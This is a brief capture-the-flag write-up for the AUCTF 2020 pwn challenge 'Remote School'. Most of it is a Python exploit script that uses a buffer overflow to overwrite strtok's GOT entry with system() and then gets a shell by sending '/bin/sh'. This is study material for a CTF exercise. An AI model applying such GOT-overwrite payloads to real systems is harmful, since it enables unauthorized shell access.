Tags: pwn got 

Rating: 5.0

Got overwrite attack: `strtok('/bin/sh')` -> `system('/bin/sh')`

```python
libcbase = 0xf7e19000
system = libcbase+0x0003ad80
strtok_got = 0x5655904c

offset = 2048
payload = 'A'*offset
payload += p32(system)
payload += p32(strtok_got)

sla('\tName: ','TaQini')
sla('> [? for menu]: ','attend Hacker')
# debug('b *0x56556591')
sla('Welcome!\n',payload)

# strtok(cmd) -> system(cmd)
sla('> [? for menu]: ','/bin/sh')
```

[Details](http://note.taqini.space/#/ctf/AUCTF-2020/?id=remote-school)

Original writeup (http://taqini.space/2020/04/05/AUCTF-2020-pwn-wp/#Remote-School).